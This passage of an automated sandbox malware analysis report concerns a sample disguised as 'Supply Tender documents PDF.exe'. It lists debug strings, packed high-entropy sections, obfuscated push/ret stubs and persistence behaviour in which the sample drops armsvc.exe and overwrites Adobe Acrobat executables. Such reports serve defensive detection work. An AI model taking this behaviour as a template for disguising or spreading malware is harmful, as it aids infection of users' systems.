00000019.00000003.1389887586.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1393035497.0000000003100000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1349831301.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1349831301.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1424612524.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1699613216.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Supply Tender documents PDF.exe, 00000000.00000003.1154076957.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1222505095.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000001.00000003.1160283828.0000000001A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Supply Tender documents PDF.exe, 00000000.00000003.1154076957.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1176733295.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1265153504.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1260014174.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1516990846.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1342114265.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851868408.00000000009C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1298716234.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737492104.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1699613216.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851868408.00000000009C0000.00000004.00001000.00020000.00000000.sdmp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x15498e

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: setup.exe.1.dr	Static PE information: section name: .gxfg
Source: setup.exe.1.dr	Static PE information: section name: .retplne
Source: setup.exe.1.dr	Static PE information: section name: .rodata
Source: setup.exe.1.dr	Static PE information: section name: CPADinfo
Source: setup.exe.1.dr	Static PE information: section name: LZMADEC
Source: setup.exe.1.dr	Static PE information: section name: _RDATA
Source: setup.exe.1.dr	Static PE information: section name: malloc_h
Source: notification_helper.exe.1.dr	Static PE information: section name: .gxfg
Source: notification_helper.exe.1.dr	Static PE information: section name: .retplne
Source: notification_helper.exe.1.dr	Static PE information: section name: CPADinfo
Source: notification_helper.exe.1.dr	Static PE information: section name: _RDATA
Source: os_update_handler.exe.1.dr	Static PE information: section name: .gxfg
Source: os_update_handler.exe.1.dr	Static PE information: section name: .retplne
Source: os_update_handler.exe.1.dr	Static PE information: section name: CPADinfo
Source: os_update_handler.exe.1.dr	Static PE information: section name: LZMADEC
Source: os_update_handler.exe.1.dr	Static PE information: section name: _RDATA
Source: chrome_proxy.exe.1.dr	Static PE information: section name: .gxfg
Source: chrome_proxy.exe.1.dr	Static PE information: section name: .retplne
Source: chrome_proxy.exe.1.dr	Static PE information: section name: _RDATA
Source: crashreporter.exe.1.dr	Static PE information: section name: .00cfg
Source: crashreporter.exe.1.dr	Static PE information: section name: .voltbl
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .00cfg
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .voltbl
Source: firefox.exe.1.dr	Static PE information: section name: .00cfg
Source: firefox.exe.1.dr	Static PE information: section name: .freestd
Source: firefox.exe.1.dr	Static PE information: section name: .retplne
Source: firefox.exe.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.1.dr	Static PE information: section name: _RDATA
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .voltbl
Source: pingsender.exe.1.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.1.dr	Static PE information: section name: .voltbl
Source: plugin-container.exe.1.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.1.dr	Static PE information: section name: .voltbl
Source: FXSSVC.exe.1.dr	Static PE information: section name: .didat
Source: private_browsing.exe.1.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.1.dr	Static PE information: section name: .voltbl
Source: elevation_service.exe.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.1.dr	Static PE information: section name: _RDATA
Source: updater.exe.1.dr	Static PE information: section name: CPADinfo
Source: updater.exe.1.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe0.1.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.1.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.1.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.1.dr	Static PE information: section name: _RDATA
Source: msdtc.exe.1.dr	Static PE information: section name: .didat
Source: msiexec.exe.1.dr	Static PE information: section name: .didat
Source: MsSense.exe.1.dr	Static PE information: section name: .didat
Source: unpack200.exe.1.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.1.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.1.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.1.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.1.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.1.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.1.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.1.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.1.dr	Static PE information: section name: malloc_h
Source: Spectrum.exe.1.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.1.dr	Static PE information: section name: .didat
Source: vds.exe.1.dr	Static PE information: section name: .didat
Source: VSSVC.exe.1.dr	Static PE information: section name: .didat
Source: setup.exe0.1.dr	Static PE information: section name: .00cfg
Source: setup.exe0.1.dr	Static PE information: section name: .gxfg
Source: setup.exe0.1.dr	Static PE information: section name: .retplne
Source: setup.exe0.1.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.1.dr	Static PE information: section name: _RDATA
Source: setup.exe0.1.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.1.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.1.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.1.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.1.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.1.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.1.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.1.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.1.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.1.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.1.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.1.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.1.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.1.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.1.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.1.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.1.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.1.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe0.1.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe0.1.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe0.1.dr	Static PE information: section name: .retplne
Source: pwahelper.exe0.1.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe0.1.dr	Static PE information: section name: malloc_h
Source: WmiApSrv.exe.1.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.1.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55C38h; ret	0_2_02F55C35
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55C98h; ret	0_2_02F55C79
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55D22h; ret	0_2_02F55CB0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55F3Eh; ret	0_2_02F55D79
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55E05h; ret	0_2_02F55DD4
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55FAEh; ret	0_2_02F55F1A
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55EE7h; ret	0_2_02F55F39
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F55E3Ch; ret	0_2_02F55F48
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56056h; ret	0_2_02F56014
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F562B2h; ret	0_2_02F5604C
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F561B2h; ret	0_2_02F56055
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F561E9h; ret	0_2_02F56092
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F5616Dh; ret	0_2_02F560B0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F560FAh; ret	0_2_02F560BF
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56189h; ret	0_2_02F560D2
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F5621Ch; ret	0_2_02F561D1
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56248h; ret	0_2_02F561E8
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F5606Fh; ret	0_2_02F562AF
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56374h; ret	0_2_02F56367
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F563BDh; ret	0_2_02F56373
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56441h; ret	0_2_02F563FA
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F563FFh; ret	0_2_02F5642E
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56563h; ret	0_2_02F56485
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F5651Ch; ret	0_2_02F5659E
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F565CAh; ret	0_2_02F56695
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56947h; ret	0_2_02F566A1
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56A3Bh; ret	0_2_02F566B3
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F56869h; ret	0_2_02F5673A
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0 push 02F565D8h; ret	0_2_02F5684D

Source: Supply Tender documents PDF.exe	Static PE information: section name: .reloc entropy: 7.920469165491532
Source: mouslingly.exe.0.dr	Static PE information: section name: .reloc entropy: 7.920469165491532
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.923590419245631
Source: setup.exe.1.dr	Static PE information: section name: .reloc entropy: 7.922723362556654
Source: notification_helper.exe.1.dr	Static PE information: section name: .reloc entropy: 7.932457616533312
Source: jucheck.exe.1.dr	Static PE information: section name: .reloc entropy: 7.92017698900122
Source: jusched.exe.1.dr	Static PE information: section name: .reloc entropy: 7.924953171063757
Source: os_update_handler.exe.1.dr	Static PE information: section name: .reloc entropy: 7.931230427143684
Source: chrome_proxy.exe.1.dr	Static PE information: section name: .reloc entropy: 7.928359254781473
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .reloc entropy: 7.929312070973965
Source: firefox.exe.1.dr	Static PE information: section name: .reloc entropy: 7.9265020708241
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .reloc entropy: 7.922368607577279
Source: FXSSVC.exe.1.dr	Static PE information: section name: .reloc entropy: 7.93008040703756
Source: elevation_service.exe.1.dr	Static PE information: section name: .reloc entropy: 7.932994407167785
Source: updater.exe.1.dr	Static PE information: section name: .reloc entropy: 7.870936241335805
Source: elevation_service.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.933959456849583
Source: SensorDataService.exe.1.dr	Static PE information: section name: .reloc entropy: 7.922542437633051
Source: identity_helper.exe.1.dr	Static PE information: section name: .reloc entropy: 7.9282513027447665
Source: Spectrum.exe.1.dr	Static PE information: section name: .reloc entropy: 7.933299797156649
Source: AgentService.exe.1.dr	Static PE information: section name: .reloc entropy: 7.92438092146958
Source: vds.exe.1.dr	Static PE information: section name: .reloc entropy: 7.9288121623207894
Source: VSSVC.exe.1.dr	Static PE information: section name: .reloc entropy: 7.927170705533152
Source: wbengine.exe.1.dr	Static PE information: section name: .reloc entropy: 7.929028541001214
Source: setup.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.932289341680361
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .reloc entropy: 7.923561201144997
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .reloc entropy: 7.929870153251997
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: section name: .reloc entropy: 7.934267044884725
Source: notification_click_helper.exe.1.dr	Static PE information: section name: .reloc entropy: 7.931779823673454
Source: pwahelper.exe.1.dr	Static PE information: section name: .reloc entropy: 7.928417085577669
Source: msedge_proxy.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.929872061776111
Source: pwahelper.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.92841138315838
Source: wmpnetwk.exe.1.dr	Static PE information: section name: .reloc entropy: 7.934830991191506
Source: SearchIndexer.exe.1.dr	Static PE information: section name: .reloc entropy: 7.933784672992943
Source: 7zFM.exe.1.dr	Static PE information: section name: .reloc entropy: 7.919209572780463
Source: 7zG.exe.1.dr	Static PE information: section name: .reloc entropy: 7.914534813626521

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
